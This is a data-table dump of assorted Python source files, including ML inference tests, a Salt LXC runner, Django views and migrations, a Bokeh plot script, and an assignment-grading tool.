ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | b410f4b15c5fd0a89d15b5b4c0e414358fe0fb12 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import argparse
import logging
import struct
import six
import nose
import numpy as np
from test_cpu_helper import TestModelInferenceCPU
class TestSeResnext50InferenceCPU(TestModelInferenceCPU):
"""
TestModelInferenceCPU
Args:
Return:
"""
def test_inference_seresnext50_cpu(self):
"""
Inference and check value
seresnext50 cpu model
Args:
None
Return:
None
"""
model_name = "SE_ResNeXt50_32x4d_pretrained"
tmp_path = os.path.join(self.model_root, "classification")
model_path = os.path.join(tmp_path, model_name, "model")
data_path = os.path.join(tmp_path, model_name, "data/data.json")
delta = 0.0001
res, exp = self.get_infer_results(model_path, data_path)
for i in range(len(res)):
self.check_data(res[i].flatten(), exp[i].flatten(), delta)
|
py | b410f5f812e288641b436497121de3a018313010 | #!/usr/bin/env python
'''
Run brat using the built-in Python CGI server for testing purposes.
Author: Pontus Stenetorp <pontus stenetorp se>
Version: 2012-07-01
'''
from BaseHTTPServer import HTTPServer, test as simple_http_server_test
from CGIHTTPServer import CGIHTTPRequestHandler
# Note: It is a terrible idea to import the function below, but we don't have
# a choice if we want to emulate the super-class is_cgi method.
from CGIHTTPServer import _url_collapse_path_split
from sys import stderr
from urlparse import urlparse
# Note: The only reason that we sub-class in order to pull is the stupid
# is_cgi method that assumes the usage of specific CGI directories, I simply
# refuse to play along with this kind of non-sense.
class BRATCGIHTTPRequestHandler(CGIHTTPRequestHandler):
def is_cgi(self):
# Having a CGI suffix is really a big hint of being a CGI script.
if urlparse(self.path).path.endswith('.cgi'):
self.cgi_info = _url_collapse_path_split(self.path)
return True
else:
return CGIHTTPRequestHandler.is_cgi(self)
def main(args):
# BaseHTTPServer will look for the port in argv[1] or default to 8000
try:
try:
port = int(args[1])
except ValueError:
raise TypeError
except TypeError:
print >> stderr, '%s is not a valid port number' % args[1]
return -1
except IndexError:
port = 8000
print >> stderr, 'WARNING: This server is for testing purposes only!'
print >> stderr, (' You can also use it for trying out brat before '
'deploying on a "real" web server such as Apache.')
print >> stderr, (' Using this web server to run brat on an open '
'network is a security risk!')
print >> stderr
print >> stderr, 'You can access the test server on:'
print >> stderr
print >> stderr, ' http://localhost:%s/' % port
print >> stderr
simple_http_server_test(BRATCGIHTTPRequestHandler, HTTPServer)
if __name__ == '__main__':
from sys import argv
exit(main(argv))
|
py | b410f5fc4d8b5099c752a52090a56bc098781278 | #!/usr/bin/env python3
# Apache License, Version 2.0
import argparse
import os
import shlex
import shutil
import subprocess
import sys
def setup():
import bpy
for scene in bpy.data.scenes:
scene.render.engine = 'BLENDER_EEVEE'
# Enable Eevee features
scene = bpy.context.scene
eevee = scene.eevee
eevee.use_ssr = True
eevee.use_ssr_refraction = True
eevee.use_gtao = True
eevee.use_volumetric_shadows = True
eevee.volumetric_tile_size = '2'
for mat in bpy.data.materials:
mat.use_screen_refraction = True
mat.use_sss_translucency = True
# When run from inside Blender, render and exit.
try:
import bpy
inside_blender = True
except ImportError:
inside_blender = False
if inside_blender:
try:
setup()
except Exception as e:
print(e)
sys.exit(1)
def render_file(filepath, output_filepath):
dirname = os.path.dirname(filepath)
basedir = os.path.dirname(dirname)
subject = os.path.basename(dirname)
frame_filepath = output_filepath + '0001.png'
command = [
BLENDER,
"--background",
"-noaudio",
"--factory-startup",
"--enable-autoexec",
filepath,
"-E", "BLENDER_EEVEE",
"-P",
os.path.realpath(__file__),
"-o", output_filepath,
"-F", "PNG",
"-f", "1"]
try:
# Success
output = subprocess.check_output(command)
if os.path.exists(frame_filepath):
shutil.copy(frame_filepath, output_filepath)
os.remove(frame_filepath)
if VERBOSE:
print(" ".join(command))
print(output.decode("utf-8"))
return None
except subprocess.CalledProcessError as e:
# Error
if os.path.exists(frame_filepath):
os.remove(frame_filepath)
if VERBOSE:
print(" ".join(command))
print(e.output.decode("utf-8"))
if b"Error: engine not found" in e.output:
return "NO_ENGINE"
elif b"blender probably wont start" in e.output:
return "NO_START"
return "CRASH"
except BaseException as e:
# Crash
if os.path.exists(frame_filepath):
os.remove(frame_filepath)
if VERBOSE:
print(" ".join(command))
print(e)
return "CRASH"
def create_argparse():
parser = argparse.ArgumentParser()
parser.add_argument("-blender", nargs="+")
parser.add_argument("-testdir", nargs=1)
parser.add_argument("-outdir", nargs=1)
parser.add_argument("-idiff", nargs=1)
return parser
def main():
parser = create_argparse()
args = parser.parse_args()
global BLENDER, VERBOSE
BLENDER = args.blender[0]
VERBOSE = os.environ.get("BLENDER_VERBOSE") is not None
test_dir = args.testdir[0]
idiff = args.idiff[0]
output_dir = args.outdir[0]
from modules import render_report
report = render_report.Report("Eevee Test Report", output_dir, idiff)
report.set_pixelated(True)
report.set_reference_dir("eevee_renders")
report.set_compare_engines('eevee', 'cycles')
ok = report.run(test_dir, render_file)
sys.exit(not ok)
if not inside_blender and __name__ == "__main__":
main()
|
py | b410f6d5dab50cca8264501f7eb64e9cc09cf7e9 | import pandas as pd
from bokeh.models import HoverTool, ColumnDataSource
from bokeh.plotting import figure, show
from bokeh.sampledata.periodic_table import elements
elements = elements.copy()
elements = elements[elements.group != "-"]
elements.sort_values('metal', inplace=True)
colormap = {
"alkali metal" : "#a6cee3",
"alkaline earth metal" : "#1f78b4",
"halogen" : "#fdbf6f",
"metal" : "#b2df8a",
"metalloid" : "#33a02c",
"noble gas" : "#bbbb88",
"nonmetal" : "#baa2a6",
"transition metal" : "#e08e79",
}
source = ColumnDataSource(
data=dict(
atomic_number=elements["atomic number"],
sym=elements["symbol"],
name=elements["name"],
atomic_mass = pd.to_numeric(elements['atomic mass'], errors="coerce"),
density=elements['density'],
metal=[x.title() for x in elements["metal"]],
type_color=[colormap[x] for x in elements["metal"]]
)
)
mass_format = '{0.00}'
hover = HoverTool(tooltips="""
<div style="width: 62px; height: 62px; opacity: .8; padding: 5px; background-color: @type_color;>
<h1 style="margin: 0; font-size: 12px;"> @atomic_number </h1>
<h1 style="margin: 0; font-size: 24px;"><strong> @sym </strong></h1>
<p style=" margin: 0; font-size: 8px;"><strong> @name </strong></p>
<p style="margin: 0; font-size: 8px;"> @atomic_mass{mass_format} </p>
</div>
""".format(mass_format=mass_format)
)
p = figure(plot_width=900, plot_height=450, tools=[hover], title='Densities by Atomic Mass')
p.circle('atomic_mass', 'density', size=12, source=source, color='type_color',
line_color="black", legend='metal', fill_alpha=0.9)
p.xaxis.axis_label= 'Atomic Mass'
p.yaxis.axis_label= 'Density'
p.grid.grid_line_color = None
p.toolbar_location = None
l = p.legend[0]
l.plot = None
p.add_layout(l, 'right')
l.border_line_color = None
show(p)
|
py | b410f77fa7c2d7a96185b178267aac441bd21e55 | # -*- coding: utf-8 -*-
'''
Control Linux Containers via Salt
:depends: lxc execution module
'''
# Import python libs
from __future__ import print_function
# Import Salt libs
import salt.client
import salt.utils.virt
import salt.key
# Don't shadow built-in's.
__func_alias__ = {
'list_': 'list'
}
def _do(name, fun):
'''
Invoke a function in the lxc module with no args
'''
host = find_guest(name, quiet=True)
if not host:
return False
client = salt.client.get_local_client(__opts__['conf_file'])
cmd_ret = client.cmd_iter(
host,
'lxc.{0}'.format(fun),
[name],
timeout=60)
data = next(cmd_ret)
data = data.get(host, {}).get('ret', None)
if data:
data = {host: data}
return data
def _do_names(names, fun):
'''
Invoke a function in the lxc module with no args
'''
ret = {}
hosts = find_guests(names)
if not hosts:
return False
client = salt.client.get_local_client(__opts__['conf_file'])
cmds = []
for host, sub_names in hosts.items():
for name in sub_names:
cmds.append(client.cmd_iter(
host,
'lxc.{0}'.format(fun),
[name],
timeout=60))
for cmd in cmds:
data = next(cmd)
data = data.get(host, {}).get('ret', None)
if data:
ret.update({host: data})
return ret
def find_guest(name, quiet=False):
'''
Returns the host for a container.
.. code-block:: bash
salt-run lxc.find_guest name
'''
for data in _list_iter():
host, l = data.items()[0]
for x in 'running', 'frozen', 'stopped':
if name in l[x]:
if not quiet:
salt.output.display_output(
host,
'lxc_find_host',
__opts__)
return host
return None
def find_guests(names):
'''
Return a dict of hosts and named guests
'''
ret = {}
names = names.split(',')
for data in _list_iter():
host, stat = data.items()[0]
for state in stat:
for name in stat[state]:
if name in names:
if host in ret:
ret[host].append(name)
else:
ret[host] = [name]
return ret
def init(names,
host=None,
**kwargs):
'''
Initialize a new container
.. code-block:: bash
salt-run lxc.init name host=minion_id [cpuset=cgroups_cpuset] \\
[cpushare=cgroups_cpushare] [memory=cgroups_memory] \\
[template=lxc template name] [clone=original name] \\
[nic=nic_profile] [profile=lxc_profile] \\
[nic_opts=nic_opts] [start=(true|false)] \\
[seed=(true|false)] [install=(true|false)] \\
[config=minion_config] [snapshot=(true|false)]
names
Name of the containers, supports a single name or a comma delimited
list of names.
host
Minion to start the container on. Required.
cpuset
cgroups cpuset.
cpushare
cgroups cpu shares.
memory
cgroups memory limit, in MB.
template
Name of LXC template on which to base this container
clone
Clone this container from an existing container
nic
Network interfaces profile (defined in config or pillar).
profile
A LXC profile (defined in config or pillar).
nic_opts
Extra options for network interfaces. E.g:
{"eth0": {"mac": "aa:bb:cc:dd:ee:ff", "ipv4": "10.1.1.1", "ipv6": "2001:db8::ff00:42:8329"}}
start
Start the newly created container.
seed
Seed the container with the minion config and autosign its key. Default: true
install
If salt-minion is not already installed, install it. Default: true
config
Optional config paramers. By default, the id is set to the name of the
container.
'''
if host is None:
#TODO: Support selection of host based on available memory/cpu/etc.
print('A host must be provided')
return False
names = names.split(',')
print('Searching for LXC Hosts')
data = __salt__['lxc.list'](host, quiet=True)
for host, containers in data.items():
for name in names:
if name in sum(containers.values(), []):
print('Container \'{0}\' already exists on host \'{1}\''.format(
name, host))
return False
if host not in data:
print('Host \'{0}\' was not found'.format(host))
return False
kw = dict((k, v) for k, v in kwargs.items() if not k.startswith('__'))
approve_key = kw.get('approve_key', True)
if approve_key:
for name in names:
kv = salt.utils.virt.VirtKey(host, name, __opts__)
if kv.authorize():
print('Container key will be preauthorized')
else:
print('Container key preauthorization failed')
return False
client = salt.client.get_local_client(__opts__['conf_file'])
print('Creating container(s) \'{0}\' on host \'{1}\''.format(names, host))
cmds = []
ret = {}
for name in names:
args = [name]
cmds.append(client.cmd_iter(host,
'lxc.init',
args,
kwarg=kwargs,
timeout=600))
ret = {}
for cmd in cmds:
sub_ret = next(cmd)
if sub_ret and host in sub_ret:
if host in ret:
ret[host].append(sub_ret[host]['ret'])
else:
ret[host] = [sub_ret[host]['ret']]
else:
ret = {}
for host, returns in ret.items():
for j_ret in returns:
if j_ret.get('created', False) or j_ret.get('cloned', False):
print('Container \'{0}\' initialized on host \'{1}\''.format(
j_ret.get('name'), host))
else:
error = j_ret.get('error', 'unknown error')
print('Container \'{0}\' was not initialized: {1}'.format(j_ret.get(name), error))
return ret or None
def _list_iter(host=None):
'''
Return a generator iterating over hosts
'''
tgt = host or '*'
client = salt.client.get_local_client(__opts__['conf_file'])
for container_info in client.cmd_iter(tgt, 'lxc.list'):
if not container_info:
continue
if not isinstance(container_info, dict):
continue
chunk = {}
id_ = container_info.keys()[0]
if host and host != id_:
continue
if not isinstance(container_info[id_], dict):
continue
if 'ret' not in container_info[id_]:
continue
if not isinstance(container_info[id_]['ret'], dict):
continue
chunk[id_] = container_info[id_]['ret']
yield chunk
def list_(host=None, quiet=False):
'''
List defined containers (running, stopped, and frozen) for the named
(or all) host(s).
.. code-block:: bash
salt-run lxc.list [host=minion_id]
'''
it = _list_iter(host)
ret = {}
for chunk in it:
ret.update(chunk)
if not quiet:
salt.output.display_output(chunk, 'lxc_list', __opts__)
return ret
def purge(name, delete_key=True, quiet=False):
'''
Purge the named container and delete its minion key if present.
WARNING: Destroys all data associated with the container.
.. code-block:: bash
salt-run lxc.purge name
'''
data = _do_names(name, 'destroy')
if data is False:
return data
if delete_key:
skey = salt.key.Key(__opts__)
skey.delete_key(name)
if data is None:
return
if not quiet:
salt.output.display_output(data, 'lxc_purge', __opts__)
return data
def start(name, quiet=False):
'''
Start the named container.
.. code-block:: bash
salt-run lxc.start name
'''
data = _do_names(name, 'start')
if data and not quiet:
salt.output.display_output(data, 'lxc_start', __opts__)
return data
def stop(name, quiet=False):
'''
Stop the named container.
.. code-block:: bash
salt-run lxc.stop name
'''
data = _do_names(name, 'stop')
if data and not quiet:
salt.output.display_output(data, 'lxc_force_off', __opts__)
return data
def freeze(name, quiet=False):
'''
Freeze the named container
.. code-block:: bash
salt-run lxc.freeze name
'''
data = _do_names(name, 'freeze')
if data and not quiet:
salt.output.display_output(data, 'lxc_pause', __opts__)
return data
def unfreeze(name, quiet=False):
'''
Unfreeze the named container
.. code-block:: bash
salt-run lxc.unfreeze name
'''
data = _do_names(name, 'unfreeze')
if data and not quiet:
salt.output.display_output(data, 'lxc_resume', __opts__)
return data
def info(name, quiet=False):
'''
Returns information about a container.
.. code-block:: bash
salt-run lxc.info name
'''
data = _do_names(name, 'info')
if data and not quiet:
salt.output.display_output(data, 'lxc_info', __opts__)
return data
|
py | b410f791be43056132e2f07b18d3ce3ab8595430 | #
# Copyright © 2021 United States Government as represented by the Administrator
# of the National Aeronautics and Space Administration. No copyright is claimed
# in the United States under Title 17, U.S. Code. All Other Rights Reserved.
#
# SPDX-License-Identifier: NASA-1.3
#
from importlib import resources
from .extern import igrf as igrf_data
from .extern import aep8 as aep8_data
with resources.path(igrf_data, 'dgrf1945.dat') as p:
IGRF_DATA_PATH = str(p.parent.resolve())
with resources.path(aep8_data, 'ae8min.asc') as p:
AEP8_DATA_PATH = str(p.parent.resolve())
del igrf_data, aep8_data
|
py | b410f7a066edb60de6f96e06349e607018ea1cd0 | import numpy as np
import pySALESetup as pss
import matplotlib.pyplot as plt
from math import ceil
def CDF(x):
# The CDF
A = 2.908
B = 0.028
C = 0.320
L = 0.643
a = 99.4
return (1./a)*A/(B+C*np.exp(-L*x))
def PDF(x):
# The PDF
A = 2.908
B = 0.028
C = 0.320
L = 0.643
a = 99.4
pdf = (1./a)*A*L*C*np.exp(L*x)/(B+C*np.exp(L*x))**2.
return pdf
def lunar_pdf(x,LB_tol,UB_tol):
# Integrate PDF at a value of x
P = abs(CDF(x+UB_tol) - CDF(x-LB_tol))
return P
def PHI_(x):
"""
x must be in SI (metres) for this function to work
PHI is only calculated correctly when the arg is mm
"""
return -1.*np.log2(x*1000.)
def DD_(x):
return 2.**(-x)
# Top and bottom mesh created separately
meshA = pss.Mesh(X=500,Y=1200,cellsize=2.5e-6)
meshB = pss.Mesh(X=500,Y=1200,cellsize=2.5e-6)
meshA.label='A'
meshB.label='B'
# target volume (area) fraction
vfrac = 0.5
# Store grain objects in list, 'grains'
grains = []
# Minimum krubeim phi = min resolution (4 cppr)
# Max ... '' '' '' '' = max resolution (200 cppr)
# Max res is one which still fits in the domain
minphi = -np.log2(2*4*2.5e-3)
maxphi = -np.log2(2*200*2.5e-3)
# create 10 different particles
N = 10
# Generate N phi values and equiv radii (in cells)
phi = np.linspace(minphi,maxphi,N)
Rs = ((DD_(phi)*.5*1.e-3)/meshA.cellsize)
# interval over which to calculate number from pdf
# No. = |CDF(x+h) - CDF(x-h)| * no. of areas
h = abs(phi[1]-phi[0])*.5
# target area that ALL particles should take up at end
target_area = float(meshA.x*meshA.y*vfrac)
for r,p in zip(Rs,phi):
# generate grain object with radius r
g = pss.Grain(eqr=int(r))
# calculate the target number of grains from CDF (see above)
prob = abs(CDF(p+h) - CDF(p-h))
g.targetFreq = int(round(prob * (target_area/float(g.area))))
grains.append(g)
# library of grains has been generated, now place them into the mesh!
# Just meshA for now
# order grains from largest to smallest
grains = [g for _,g in sorted(zip(phi,grains))]
groupA = pss.Ensemble(meshA,name='mirror_test_ens')
try:
i = 0
for g in grains:
for f in range(g.targetFreq):
g.insertRandomly(meshA, m=1)
groupA.add(g,g.x,g.y)
except KeyboardInterrupt:
pass
groupA.optimise_materials(np.array([1,2,3,4,5,6,7,8]))
groupA.save()
meshA.fillAll(-1)
for xA,yA,gA,mA in zip(groupA.xc,groupA.yc,groupA.grains,groupA.mats):
gA.place(xA,yA,mA,meshA)
meshA.fillAll(9)
import copy
meshB = copy.deepcopy(meshA)
meshB.flipMesh()
meshA.blanketVel(-1500.,axis=1)
meshB.blanketVel(+1500.,axis=1)
meshC = pss.combine_meshes(meshA,meshB,axis=1)
meshC.top_and_tail()
meshC.viewMats()
meshC.viewVels()
meshC.save(fname='regolith_mirror_v3000.iSALE',compress=True)
meshC.multiplyVels()
meshC.save(fname='regolith_mirror_v1500.iSALE',compress=True)
meshC.multiplyVels()
meshC.save(fname='regolith_mirror_v750.iSALE',compress=True)
|
py | b410f852123fa07a520fbda3f224ebfd4643a72c | # -*- coding: utf-8 -*-
from cornice.resource import resource, view
from openprocurement.api.models import Award, Complaint, STAND_STILL_TIME, get_now
from openprocurement.api.utils import (
apply_data_patch,
save_tender,
)
from openprocurement.api.validation import (
validate_complaint_data,
validate_patch_complaint_data,
)
@resource(name='Tender Award Complaints',
collection_path='/tenders/{tender_id}/awards/{award_id}/complaints',
path='/tenders/{tender_id}/awards/{award_id}/complaints/{complaint_id}',
description="Tender award complaints")
class TenderAwardComplaintResource(object):
def __init__(self, request):
self.request = request
self.db = request.registry.db
@view(content_type="application/json", permission='create_award_complaint', validators=(validate_complaint_data,), renderer='json')
def collection_post(self):
"""Post a complaint for award
"""
tender = self.request.validated['tender']
if tender.status not in ['active.qualification', 'active.awarded']:
self.request.errors.add('body', 'data', 'Can\'t add complaint in current tender status')
self.request.errors.status = 403
return
complaint_data = self.request.validated['data']
complaint = Complaint(complaint_data)
self.request.validated['award'].complaints.append(complaint)
save_tender(self.request)
self.request.response.status = 201
self.request.response.headers['Location'] = self.request.route_url('Tender Award Complaints', tender_id=tender.id, award_id=self.request.validated['award_id'], complaint_id=complaint['id'])
return {'data': complaint.serialize("view")}
@view(renderer='json', permission='view_tender')
def collection_get(self):
"""List complaints for award
"""
return {'data': [i.serialize("view") for i in self.request.validated['award'].complaints]}
@view(renderer='json', permission='view_tender')
def get(self):
"""Retrieving the complaint for award
"""
return {'data': self.request.validated['complaint'].serialize("view")}
@view(content_type="application/json", permission='review_complaint', validators=(validate_patch_complaint_data,), renderer='json')
def patch(self):
"""Post a complaint resolution for award
"""
tender = self.request.validated['tender']
if tender.status not in ['active.qualification', 'active.awarded']:
self.request.errors.add('body', 'data', 'Can\'t update complaint in current tender status')
self.request.errors.status = 403
return
complaint = self.request.validated['complaint']
if complaint.status != 'pending':
self.request.errors.add('body', 'data', 'Can\'t update complaint in current status')
self.request.errors.status = 403
return
complaint_data = self.request.validated['data']
if complaint_data:
if complaint_data.get('status', '') == 'cancelled':
self.request.errors.add('body', 'data', 'Can\'t cancel complaint')
self.request.errors.status = 403
return
complaint.import_data(apply_data_patch(complaint.serialize(), complaint_data))
if complaint.status == 'resolved':
award = self.request.validated['award']
if tender.status == 'active.awarded':
tender.status = 'active.qualification'
tender.awardPeriod.endDate = None
if award.status == 'unsuccessful':
for i in tender.awards[tender.awards.index(award):]:
i.status = 'cancelled'
for j in i.complaints:
if j.status == 'pending':
j.status = 'cancelled'
for i in award.contracts:
i.status = 'cancelled'
award.status = 'cancelled'
unsuccessful_awards = [i.bid_id for i in tender.awards if i.status == 'unsuccessful']
bids = [i for i in sorted(tender.bids, key=lambda i: (i.value.amount, i.date)) if i.id not in unsuccessful_awards]
if bids:
bid = bids[0].serialize()
award_data = {
'bid_id': bid['id'],
'status': 'pending',
'value': bid['value'],
'suppliers': bid['tenderers'],
}
award = Award(award_data)
tender.awards.append(award)
else:
tender.awardPeriod.endDate = get_now()
tender.status = 'active.awarded'
elif complaint.status in ['declined', 'invalid'] and tender.status == 'active.awarded':
pending_complaints = [
i
for i in tender.complaints
if i.status == 'pending'
]
pending_awards_complaints = [
i
for a in tender.awards
for i in a.complaints
if i.status == 'pending'
]
stand_still_time_expired = tender.awardPeriod.endDate + STAND_STILL_TIME < get_now()
if not pending_complaints and not pending_awards_complaints and stand_still_time_expired:
active_awards = [
a
for a in tender.awards
if a.status == 'active'
]
if active_awards:
tender.status = 'complete'
else:
tender.status = 'unsuccessful'
save_tender(self.request)
return {'data': complaint.serialize("view")}
|
py | b410f8a9385591779c1b1df2eb01230d46f5a98b | from django.contrib import admin
# Register your models here.
from .models import *
# Register your models here.
class ProfileA(admin.ModelAdmin):
list_display=('user', 'Department','Course','Phone_number')
list_filter = ('Department','Course')
admin.site.register(Profile, ProfileA) |
py | b410fb7c229cc720134d59875e50f6100405ada3 | from onegov.file.models.file import File, SearchableFile
from onegov.file.models.fileset import FileSet
from onegov.file.models.associated_files import AssociatedFiles
__all__ = (
'AssociatedFiles',
'File',
'FileSet',
'SearchableFile'
)
|
py | b410fc8ea070fc061b00ce4355c4dd8abb4baad1 | # -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
Package contains modules for generating pipelines using interfaces
"""
__docformat__ = 'restructuredtext'
from .engine import Node, MapNode, JoinNode, Workflow
|
py | b410fcb96d45532e4e8b08296bd2e24b6a7dc737 | """
CryptoAPIs
Crypto APIs 2.0 is a complex and innovative infrastructure layer that radically simplifies the development of any Blockchain and Crypto related applications. Organized around REST, Crypto APIs 2.0 can assist both novice Bitcoin/Ethereum enthusiasts and crypto experts with the development of their blockchain applications. Crypto APIs 2.0 provides unified endpoints and data, raw data, automatic tokens and coins forwardings, callback functionalities, and much more. # noqa: E501
The version of the OpenAPI document: 2.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import cryptoapis
from cryptoapis.model.get_zilliqa_block_details_by_block_hash_ri import GetZilliqaBlockDetailsByBlockHashRI
class TestGetZilliqaBlockDetailsByBlockHashRI(unittest.TestCase):
"""GetZilliqaBlockDetailsByBlockHashRI unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testGetZilliqaBlockDetailsByBlockHashRI(self):
"""Test GetZilliqaBlockDetailsByBlockHashRI"""
# FIXME: construct object with mandatory attributes with example values
# model = GetZilliqaBlockDetailsByBlockHashRI() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
py | b410fce2001258b264b45889d9fef8de87c06592 | # Create your views here.
from rest_framework import viewsets, status
from rest_framework.decorators import permission_classes
from rest_framework.parsers import JSONParser
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from shares.models import Share
from shares.serializers import ShareSerializer
# Create your views here.
class ShareViewSet(viewsets.ModelViewSet):
queryset = Share.objects.all()
serializer_class = ShareSerializer
# 指定这个view的 Content-Type 是 application/json
parser_classes = (JSONParser,)
def get_permissions(self):
if self.action in ('create',):
self.permission_classes = [IsAuthenticated]
return [permission() for permission in self.permission_classes]
# [GET] api/share/, 不需要授权
def list(self, request, **kwargs):
users = Share.objects.all()
serializer = ShareSerializer(users, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
# [POST] api/share/,需要授权,添加@permission_classes注解,会调用get_permissions()方法
@permission_classes((IsAuthenticated,))
def create(self, request, **kwargs):
name = request.data.get('name')
users = Share.objects.create(name=name)
serializer = ShareSerializer(users)
return Response(serializer.data, status=status.HTTP_201_CREATED)
|
py | b410fcf53a3daee17a32c1ae0aa94131eb4e72c8 | import os
import re
import sys
from pathlib import Path
from subprocess import run
from typing import Callable, Optional, List, Tuple, Dict, Set
from lib.functional import flatmap
from lib.model import Assignment, Check, CheckResult
from lib.grade import grade
from lib.checks import set_home_path, set_assignment_name
from lib.print import (is_in_quiet_mode, enter_quiet_mode, leave_quiet_mode, print_error,
print_message, print_usage, print_warning, print_grade, print_processing,
stop_processing_spinner, print_passed, print_failed)
DEFAULT_BULK_GRADE_DIRECTORY = os.path.abspath('./.repositories')
bulk_grade_mode = False
file_with_commit_links = None
bulk_grade_directory = DEFAULT_BULK_GRADE_DIRECTORY
def error(msg):
print_error(msg)
exit(1)
def parse_options(args, option_flags):
i = 0
options = list(map(lambda x: x[0], option_flags))
while len(args) > i and args[i][0] == '-':
if args[i] in options:
index = options.index(args[i])
if option_flags[index][2] is None:
option_flags[index][1]()
else:
i += 1
if len(args) > i:
option_flags[index][1](args[i])
else:
error('option flag "' + option_flags[index][0] +
'" needs an argument ' + option_flags[index][2])
else:
error('unknown option: ' + args[i])
i += 1
return args[i:]
def parse_assignment(args: List[str], assignments: Set[Assignment]) -> Optional[Assignment]:
if len(args) == 0:
return None
if len(args) > 1:
error('only 1 assignment allowed')
possible_assignment = list(filter(lambda a: a.name == args[0], assignments))
if len(possible_assignment) == 1:
return possible_assignment[0]
error('unknown test: {}'.format(args))
def validate_options_for(assignment: Optional[Assignment]):
if not bulk_grade_mode and is_in_quiet_mode() and assignment is None:
error('please specify a assignment')
def execute_with_output(check: Check) -> CheckResult:
print_processing(check.msg)
try:
result = check.execute()
finally:
stop_processing_spinner()
if result.result == result.should_succeed:
print_passed(check.msg)
else:
print_failed(check.msg, result.warning, result.output, result.command)
return result
def check_assignment(assignment: Assignment, baseline: Assignment) -> Tuple[int, List[str]]:
def check(a: Assignment):
return list(map(execute_with_output, a.create_checks()))
def change_result_to_mandatory(r: CheckResult):
return CheckResult(r.result, r.msg, r.output, r.warning, r.should_succeed, r.command, True)
if assignment != baseline:
baseline_results = list(map(change_result_to_mandatory, check(baseline)))
else:
baseline_results = [ ]
set_assignment_name(assignment.category)
print_message('executing test \'{}\''.format(assignment.name))
results = baseline_results + check(assignment)
set_assignment_name('')
(grade_value, reasons) = grade(results)
for reason in reasons:
print_warning(reason)
print_grade(grade_value)
def enable_bulk_grader(file):
global bulk_grade_mode, file_with_commit_links
if not os.path.exists(file):
error('the file "' + file + '" does not exist')
if not os.path.isfile(file):
error('the path "' + file + '" is not a file')
bulk_grade_mode = True
file_with_commit_links = os.path.abspath(file)
def set_bulk_grade_directory(directory):
global bulk_grade_directory
bulk_grade_directory = os.path.abspath(directory)
def parse_commit_url(url) -> Optional[Dict]:
matcher = re.match(
'^https://github.com/([^/]+)/([^/]+)/commit/([0-9a-f]+)$', url)
if matcher is None:
return None
else:
return {
'user': matcher.group(1),
'repo': matcher.group(2),
'commit': matcher.group(3)
}
def do_bulk_grading(assignment: Optional[Assignment], base_test: Assignment):
if not os.path.exists(bulk_grade_directory):
os.mkdir(bulk_grade_directory)
working_directory = os.getcwd()
os.chdir(bulk_grade_directory)
with open(file_with_commit_links, 'rt') as file:
for line in file.readlines():
info = parse_commit_url(line)
if info is None:
print_message(line + '" is not a valid github commit link')
continue
repo_id = '{}/{}'.format(info['user'], info['repo'])
print_message(repo_id + ': ', end='', loud=True)
clone_dir = os.path.join(bulk_grade_directory, repo_id)
if not os.path.exists(clone_dir):
status = os.system(
'git clone -q [email protected]:{} {} >/dev/null 2>&1'.format(repo_id, repo_id))
if status != 0:
print_message('error when cloning ' + repo_id, loud=True)
continue
os.chdir(clone_dir)
# remove all changes in local repository
os.system('git reset --hard -q >/dev/null 2>&1')
# fetch updates from github repository
os.system('git fetch -q >/dev/null 2>&1')
# change the local repository state using the commit ID
status = os.system(
'git checkout -q {} >/dev/null 2>&1'.format(info['commit']))
if status == 0:
if assignment is None:
print_message('updated', loud=True)
else:
print_message('')
check_assignment(assignment, base_test)
print_message('', loud=True)
else:
print_message(
'commit hash "{}" is not valid'.format(info['commit']))
os.chdir(bulk_grade_directory)
os.chdir(working_directory)
if bulk_grade_directory is DEFAULT_BULK_GRADE_DIRECTORY:
os.system('rm -rf {}'.format(bulk_grade_directory))
print_usage_flag = False
def set_print_usage():
global print_usage_flag
print_usage_flag = True
option_flags = [
('-q', enter_quiet_mode, None, 'only the grade is printed'),
('-h', set_print_usage, None, 'this help text'),
('-b', enable_bulk_grader, '<file>',
'bulk grade assignments defined by a file with github commit links'),
('-d', set_bulk_grade_directory, '<directory>',
'path where all bulk graded repositories should be saved')
]
def reset_state():
global bulk_grade_mode, bulk_grade_directory
global file_with_commit_links
global print_usage_flag
bulk_grade_mode = False
file_with_commit_links = None
bulk_grade_directory = DEFAULT_BULK_GRADE_DIRECTORY
set_assignment_name('')
print_usage_flag = False
leave_quiet_mode()
def process_arguments(argv: List[str], assignments: Set[Assignment], baseline: Assignment):
try:
if len(argv) <= 1:
print_usage(option_flags, assignments)
exit()
set_home_path(Path(os.path.abspath(os.path.dirname(argv[0]))))
args = parse_options(argv[1:], option_flags)
assignment = parse_assignment(args, assignments)
validate_options_for(assignment)
if print_usage_flag:
print_usage(option_flags, assignments)
exit()
if bulk_grade_mode:
do_bulk_grading(assignment, baseline)
else:
check_assignment(assignment, baseline)
finally:
reset_state()
|
py | b410fd2dcca84d06c5cb7d8e0d6481381188bd00 | # -*- coding: utf-8 -*-
from south.db import db
from django.db import models
from django_lean.experiments.models import *
class Migration:
def forwards(self, orm):
# Adding field 'DailyReport.test_group_size'
db.add_column('experiments_dailyreport', 'test_group_size', orm['experiments.dailyreport:test_group_size'])
# Adding field 'DailyReport.control_group_size'
db.add_column('experiments_dailyreport', 'control_group_size', orm['experiments.dailyreport:control_group_size'])
# Changing field 'Participant.anonymous_visitor'
# (to signature: django.db.models.fields.related.ForeignKey(to=orm['experiments.AnonymousVisitor'], null=True, blank=True))
db.alter_column('experiments_participant', 'anonymous_visitor_id', orm['experiments.participant:anonymous_visitor'])
